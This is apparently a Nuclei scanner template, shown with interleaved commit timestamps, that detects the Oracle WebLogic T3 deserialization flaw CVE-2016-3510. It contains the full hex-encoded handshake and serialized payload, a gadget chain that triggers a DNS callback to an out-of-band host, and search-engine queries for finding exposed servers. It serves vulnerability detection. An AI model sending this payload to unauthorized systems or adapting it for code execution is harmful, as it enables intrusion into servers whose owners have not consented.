2023-05-18 06:00:51 +00:00
id : CVE-2016-3510
info :
2023-05-18 14:18:04 +00:00
name : Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
2023-05-18 06:00:51 +00:00
author : iamnoooob,rootxharsh,pdresearch
severity : critical
2023-05-18 14:18:04 +00:00
description : |
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
2023-08-17 18:29:31 +00:00
remediation : |
Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
2023-09-27 15:51:13 +00:00
reference :
- https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
2024-01-14 13:49:27 +00:00
- http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
- http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
- http://www.securitytracker.com/id/1036373
- https://www.tenable.com/security/research/tra-2016-21
2023-07-10 00:25:11 +00:00
classification :
2024-01-14 13:49:27 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-07-10 00:25:11 +00:00
cvss-score : 9.8
cve-id : CVE-2016-3510
cwe-id : CWE-119
2024-06-07 10:04:29 +00:00
epss-score : 0.04407
epss-percentile : 0.92379
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
2023-05-18 14:18:04 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2024-01-14 13:49:27 +00:00
max-request : 2
vendor : oracle
product : weblogic_server
2024-06-07 10:04:29 +00:00
shodan-query :
- product:"oracle weblogic"
- http.title:"oracle peoplesoft sign-in"
fofa-query : title="oracle peoplesoft sign-in"
google-query : intitle:"oracle peoplesoft sign-in"
tags : packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp
2023-05-18 06:00:51 +00:00
variables :
start : "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
end : "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"
tcp :
- inputs :
2023-09-27 15:51:13 +00:00
- data : "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
\n"
2023-05-18 06:00:51 +00:00
read : 1024
2023-09-27 15:51:13 +00:00
- data : "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"
2023-05-18 06:00:51 +00:00
host :
- "{{Hostname}}"
2023-06-14 17:50:29 +00:00
- "{{Host}}:7001"
2023-05-18 06:00:51 +00:00
read-size : 4
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
2024-06-08 16:02:17 +00:00
# digest: 4b0a004830460221008d2606c39e5ea4351864ef8062f319aec1821364ae05e12d4a6867a0849c930e022100c7edf99ab68a3c8ede7cbdecae0b8d1516e23763e7df36b3baf2418063aa343b:922c64590222798bb761d5b6d8e72950